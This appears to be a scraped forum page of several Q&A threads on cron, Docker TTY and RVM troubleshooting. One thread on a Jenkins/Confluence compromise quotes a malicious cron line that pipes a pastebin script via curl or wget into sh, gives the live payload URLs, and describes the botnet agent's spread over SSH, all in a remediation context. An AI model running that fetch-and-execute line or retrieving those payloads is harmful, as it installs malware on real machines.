So I have a MariaDB instance in a container in /home/admin/containers/mariadb.
This directory also contains a .env file with MARIADB_ROOT_PASSWORD specified.
I want to back up the database using the following cron entry:
* * * * * root docker exec --env-file /home/admin/containers/mariadb/.env mariadb sh -c 'exec mysqldump --databases dbname -uroot -p"$MARIADB_ROOT_PASSWORD"' > /home/admin/containers/mariadb/backups/dbname.sql
The command works when run from the terminal, but under cron it only creates an empty .sql file.
I assume there is some issue with cron reading the .env file.
Bash command line is nice. Cron is "different". Let me count the ways; here are things to pay attention to.
To simplify the description, let's assume you put the above instructions into backup.sh, so the crontab line is simply
* * * * * root sh backup.sh
Cron is running under UID zero here. Test interactively with: $ sudo sh backup.sh
Cron uses a restricted $PATH. Test with: $ env PATH=/usr/bin:/bin sh backup.sh
Cron's $CWD won't be your home directory.
More generally, env will report different results than in an interactive session, because your login dot files have not all been sourced.
Cron doesn't necessarily set umask to 0022. Likely not an issue here.
Output of ulimit -a might differ from what you see interactively.
Cron does not provide a pty, which can affect e.g. password prompts. Likely not an issue here.
Likely there are other details that differ.
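One concrete way to see these differences at once is to have cron dump its environment to a file and diff it against an interactive shell's; the /tmp filenames here are just examples:
* * * * * root env > /tmp/cron_env.txt 2>&1
Then, from your terminal:
env > /tmp/interactive_env.txt
diff /tmp/interactive_env.txt /tmp/cron_env.txt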
If you find that some aspect of the environment is crucial to a successful run, then arrange for that near the top of backup.sh: you might want to adjust PATH, source a file, or cd somewhere.
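As a minimal sketch (the PATH value is an assumption; adjust for your system), backup.sh might begin like this:
#!/bin/sh
# Give cron a sane PATH and a known working directory before anything else.
PATH=/usr/local/bin:/usr/bin:/bin
export PATH
cd /home/admin/containers/mariadb || exit 1
docker exec --env-file .env mariadb \
  sh -c 'exec mysqldump --databases dbname -uroot -p"$MARIADB_ROOT_PASSWORD"' \
  > backups/dbname.sql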
Now let's examine what diagnostic clues you're gathering from each cron run. The most important detail is that while you're logging stdout, you are regrettably discarding messages sent to FD 2, stderr. You can accomplish your logging on the crontab command line, or within the backup.sh script.
Use 2>&1 to merge stderr with stdout.
Or capture each stream separately:
docker ... 2> errors.txt > dbname.sql
With no errors, errors.txt will be a zero-byte file.
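Concretely, with the paths from the question, the crontab line could capture each stream separately (the errors.txt location is just an example):
* * * * * root sh backup.sh > /home/admin/containers/mariadb/backups/dbname.sql 2> /home/admin/containers/mariadb/backups/errors.txt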
Also, remember the default behavior of crond. If you just run a command, with no redirect, cron assumes it should complete silently with zero exit status, as /usr/bin/true does. If there's a non-zero status, cron will report the error. If there's any stdout text, such as /usr/bin/date produces, cron wants to email you that text. If there's any stderr text, again it should be emailed to you.
Test your email setup. Set the cron MAILTO=me@some.where variable if the default of root wasn't suitable.
Interactively verify that email sending on that server actually works. Repair your postfix (or whatever MTA you use) setup if you find that emails are not reliably being delivered.
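For example, at the top of the crontab (the address is a placeholder), and a quick interactive test assuming a mail(1) command is installed:
MAILTO=admin@example.com
echo "cron mail test" | mail -s "cron mail test" admin@example.com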
Related
So the picture above shows a command, khugepageds, that is using 98 to 100% of CPU at times.
I tried to find out how Jenkins uses this command, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, the usage of course goes down, but once Jenkins restarts it's back up again.
Has anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron process on the system; it will try to regain escalated access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, then restart the VM.
The vulnerability adds unwanted executables in the /tmp folder and tries to access the VM via SSH. It also adds a cron entry on your system, so be sure to remove that as well.
Also check the ~/.ssh folder's known_hosts and authorized_keys files for any suspicious SSH public keys; the attacker can add their own keys to gain access to your system.
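A quick way to inspect those files; /var/lib/jenkins is the usual Jenkins home, but that path is an assumption on your setup:
ls -la /var/lib/jenkins/.ssh
cat /var/lib/jenkins/.ssh/authorized_keys   # look for any keys you do not recognize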
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in the frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/virus/botnet agents, downloads the binary to /tmp/kerberods and spawns it, then iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (size 3395072, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does; it looks like a botnet controller.
It seems like the vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for something like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you see that, try stopping Jenkins, clearing the /tmp dir, and killing all PIDs started by the jenkins user.
If CPU usage then goes down, try updating to the latest LTS version of Jenkins; then, after starting Jenkins, update all its plugins.
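A quick check for that line, assuming the standard syslog location:
grep -i pastebin /var/log/syslog
grep 'CRON (jenkins)' /var/log/syslog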
Because the cron file just gets recreated, a solution that works is to empty jenkins' cron file; I also changed the ownership, and made the file immutable.
This finally stopped the process from kicking in.
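A sketch of those steps, assuming a Debian-style cron spool (the exact path varies by distribution):
: > /var/spool/cron/crontabs/jenkins        # empty jenkins' crontab
chown root:root /var/spool/cron/crontabs/jenkins
chattr +i /var/spool/cron/crontabs/jenkins  # immutable, so the miner cannot recreate it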
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since everywhere I read about this error the given solution was to increase memory.
The problem was solved with @HeffZilla's solution.
I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user name and email. I got around that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
  if opt.config_name or self._ShouldConfigureUser():
    self._ConfigureUser()
  self._ConfigureColor()
So, I ran the following inside the container:
python -c "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any Jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run the bash script repo_script.sh "non-interactively", or more precisely without terminals associated with the standard streams, you could run it simply as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would when running repo_script.sh directly. By piping the standard output and error to a different process, the file descriptors appear to repo_script.sh as a pipe, not a TTY. You could also direct output to a file, or even to /dev/null if you do not care about the output:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might work too, though it is a very unorthodox and, to my mind, hackish way of running a script just to break the association of a TTY with standard input. From the script engine's point of view, reading a program from a file is different from reading it from standard input (which, if it is a terminal, is typically not seekable), so there might be subtle differences that could bite you in unexpected ways. This way also does not clearly communicate your intention to the next person who needs to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options; just using output redirections from within the interpreting shell, as described above, is an easy-to-comprehend, multi-platform standard convention for changing the standard stream associations.
P.S. I think it should be enough for your repo script to just test whether standard input is a TTY. It looks to me like the author of that script did not think this through: there is simply no use waiting for input if no terminal device is associated with standard input, so the script could determine from that alone that everything needs to run without user interaction, or stop with an error if that is not possible.
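For reference, the equivalent check from shell is the -t test, which is handy for confirming what a wrapper will see:
if [ -t 0 ]; then echo "stdin is a TTY"; else echo "stdin is not a TTY"; fi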
I'm having a rough time executing script/runner with cron and RVM. I believe the issue lies with the RVM environment not being set before the runner is executed.
Currently I'm getting the error
/bin/sh: 1.sql: command not found
which is more than I got earlier, so I guess that's good.
I've read this thread, Need to set up rvm environment prior to every cron job, but I'm still not really getting it. Part of the problem, I think, is the error reporting.
This is my crontab entry thus far:
*/1 * * * * * /bin/bash -l -c 'rvm use 1.8.7-p352#2310; cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"'
As per the above link, I tried making an rvm_cron_runner.
I created a file and placed this in it:
#!/bin/sh
# Load RVM into this shell, then run the command passed as the first argument.
source "/Users/dude/.rvm/scripts/rvm"
exec "$1"
Then I updated my crontab to this:
*/1 * * * * * /bin/bash -l -c '/Users/dude/development/app/my_app2310/rvm_cron_runner; rvm use 1.8.7-p352#2310; cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"'
This also made no difference. I get no error, nothing.
Can anyone see what I'm doing incorrectly?
P.S. I hope my code formatting worked.
Could you try placing the code you want to run in a separate script, and then using the rvm_cron_runner?
So place your actions in a file called /path/cron_job
rvm use 1.8.7-p352#2310
cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"
and then in your crontab write
1 2 * * * /path/rvm_cron_runner /path/cron_job
The differences:
this does not start a separate shell
it uses the parameter of the rvm_cron_runner
If you used an .rvmrc file, you could even drop the rvm use ... line, I think.
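For reference, that .rvmrc would just contain the same selection line, using the gemset notation from the question:
rvm use 1.8.7-p352#2310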
You don't need to write a second cron runner (following that logic, you might as well write a third cron runner runner). Please keep things simple. All you need to do is configure your cron job to launch a bash shell, and make that bash shell load your environment.
The shebang line in your script should not refer directly to a ruby executable, but to rvm's ruby:
#!/usr/bin/env ruby
This instructs the script to load the environment and run ruby as we would on the command line with rvm loaded.
On many UNIX derived systems, crontabs can have a configuration section before the actual lines that define the jobs to be run. If this is the case, you would then specify:
SHELL=/path/to/bash
This will ensure that the cron job will be spawned from bash. Still, your environment is missing, so to instruct bash to load your environment, you will want to add to the configuration section the following:
BASH_ENV=/path/to/environment (typically .bash_profile or .bashrc)
HOME is automatically derived from the /etc/passwd line of the crontab owner, but you can override it.
HOME=/path/to/home
After this, a cron job might look like this:
15 14 1 * * $HOME/rvm_script.rb
What if your crontab doesn't support the configuration section? Well, you will have to give all the environment directives in one line, with the job itself. For example,
15 14 1 * * export BASH_ENV=/path/to/environment && /full/path/to/bash -c '/full/path/to/rvm_script.rb'
Full blog post on the subject
You can use rvm wrappers:
/home/deploy/.rvm/wrappers/ruby-2.2.4/ruby
Source: https://rvm.io/deployment/cron#direct
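A crontab entry using such a wrapper might then look like this (the script path is a placeholder):
0 4 * * * /home/deploy/.rvm/wrappers/ruby-2.2.4/ruby /home/deploy/my_app/script/my_job.rb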
I'm having a weird issue with a start-up script which runs a Sinatra script using the shell's "daemon" function. The problem is that when I run the command at the command line, I get output to STDOUT. If I run the command at the command line exactly as it is in the script -- less the daemon part -- the output is correctly redirected to the output file. However, when the startup script runs it (see below), I get stuff to the STDERR log but not to the STDOUT log.
The relevant lines of the script:
#!/bin/sh
# (which is, and has been, a symlink to /bin/bash)
# Source function library.
. /etc/init.d/functions
# Set Some Variables
RUNAS="joeuser"
PID=/var/run/myapp.pid
LOG="/var/log/myapp/app-out.log"
ERR_LOG="/var/log/myapp/app-err.log"
APPLICATION_COMMAND="RAILS_ENV=production ruby /opt/myapp/lib/daemons/my-sinatra-app.rb -p 8002 2>>${ERR_LOG} >>${LOG} &"
# Snip a bunch. This is the applicable line from the "start" case:
daemon --user $RUNAS --pidfile $PID $APPLICATION_COMMAND &> /dev/null
Now, the funky parts:
The error log is written to correctly via the redirect of STDERR.
If I reverse the order of the >> and the 2>> (I'm grasping at straws, here!), the behavior does not change: I still get STDERR logged correctly and STDOUT is empty.
If the output log doesn't exist, the STDOUT redirect creates the file. But, the file remains 0-length.
This used to work. The log directory is maintained by logrotate. All of the more recent 'out' logs are 0-length; the older ones are not. It seems like it stopped working some time in April. The Ruby code didn't change at any time near then; neither did the startup script.
We're running three different services in this way. Two of them are ruby daemons (one uses sinatra, one does not) and the other is a background java process. This is occurring for BOTH of the ruby processes but is not happening on the java process. Maybe something changed in Ruby?
FTR, we've got ruby 1.8.5 and RHEL 5.4.
I've done some more probing. The daemon function does a bunch of stuff, but the meat of the matter is that it runs the program using runuser. The command essentially looks like this:
runuser -s /bin/bash - joeuser -c "ulimit -S -c 0 >/dev/null 2>&1 ; RAILS_ENV=production ruby /opt/myapp/lib/daemons/my-sinatra-app.rb -p 8002 '</dev/null' '>>/var/log/myapp/app-out.log' '2>>/var/log/myapp/app-err.log' '&'"
When I run exactly that at the command line (both with and without the single-ticks that got added somewhere along the line), I get the exact same screwy behavior w.r.t. the output log. So, it seems to me that this is an issue of how ruby (?) interacts with runuser?
Too long to put in a comment :-)
Change the shebang to #!/bin/sh -x and verify that everything is expanded according to your expectations. Also, when executing from a terminal your .bashrc file is sourced, but when executing from a script it is not; there might be something in your environment that differs. One way to find out is to run env from the terminal and from the script and diff the output:
env > env_terminal
env > env_script
diff env_terminal env_script
Happy hunting...
I have a Rails script that I would like to run daily. I know there are many approaches, and that a cron'd script/runner approach is frowned upon by some, but it seems to meet my needs.
However, my script is not getting executed as scheduled.
My application lives at /data/myapp/current, and the script is in script/myscript.rb. I can run it manually without problem as root with:
/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb
When I do that, the special log file (log/myscript.log) gets logged to as expected:
Tue Mar 03 13:16:00 -0500 2009 Starting to execute script...
...
Tue Mar 03 13:19:08 -0500 2009 Finished executing script in 188.075028 seconds
I have it set to run with cron every morning at 4 am. root's crontab:
$ crontab -l
0 4 * * * /data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb
In fact, it looks like it's tried to run as recently as this morning!
$ tail -100 /var/log/cron
...
Mar 2 04:00:01 hostname crond[8894]: (root) CMD (/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb)
...
Mar 3 04:00:01 hostname crond[22398]: (root) CMD (/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb)
...
However, there is no entry in my log file, and the data that it should update has not been getting updated. The log file permissions (as a test) were even set to globally writable:
$ ls -lh
total 19M
...
-rw-rw-rw- 1 myuser apps 7.4K Mar 3 13:19 myscript.log
...
I am running on CentOS 5.
So my questions are...
Where else can I look for information to debug this?
Could this be a SELinux issue? Is there a security context that I could set or change that might resolve this error?
Thank you!
Update
Thank you to Paul and Luke both. It did turn out to be an environment issue, and capturing the stderr to a log file enabled me to find the error.
$ cat cron.log
/usr/bin/env: ruby: No such file or directory
$ head /data/myapp/current/script/runner
#!/usr/bin/env ruby
require File.dirname(__FILE__) + '/../config/boot'
require 'commands/runner'
Adding the specific Ruby executable to the command did the trick:
$ crontab -l
0 4 * * * /usr/local/bin/ruby /data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb >> /data/myapp/current/log/cron.log 2>&1
By default cron mails its output to the user who ran it. You could look there.
It's very useful to redirect the output of scripts run by cron so that you can look at the results in a log file instead of some random user's local mail on the server.
Here's how you would redirect stdout and stderr to a log file:
cd /home/deploy/your_app/current; script/runner -e production ./script/my_cron_job.rb >> /home/deploy/your_app/current/log/my_file.log 2>&1
The >> redirects stdout to a file, and the 2>&1 redirects stderr to stdout, so any error messages will be logged as well.
Having done this, you will be able to examine the error messages to see what's really going on.
The usual problem when somebody discovers their script won't run in a cron job when it will run from the command line is that it relies on some piece of the environment that an interactive session has but cron doesn't get. Frequent candidates are the PATH environment variable, and possibly HOME.
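A common remedy is to set those explicitly at the top of the crontab; for example, with this question's job (values are illustrative, but note that a PATH containing /usr/local/bin would have let the /usr/bin/env ruby shebang find ruby):
PATH=/usr/local/bin:/usr/bin:/bin
HOME=/root
0 4 * * * /data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb >> /data/myapp/current/log/cron.log 2>&1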
On Linux, make sure all the config files (/etc/crontab, /etc/cron.{daily,hourly,etc}/* and /etc/cron.d/*) are writable only by root and are not symlinks; otherwise they will not even be considered.
To allow non-root and/or symlinks, specify the -p option to the crond daemon.
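On RHEL-style systems running cronie, that flag can typically be added via /etc/sysconfig/crond (this location is an assumption; check your distribution's service configuration):
# /etc/sysconfig/crond
CRONDARGS=-p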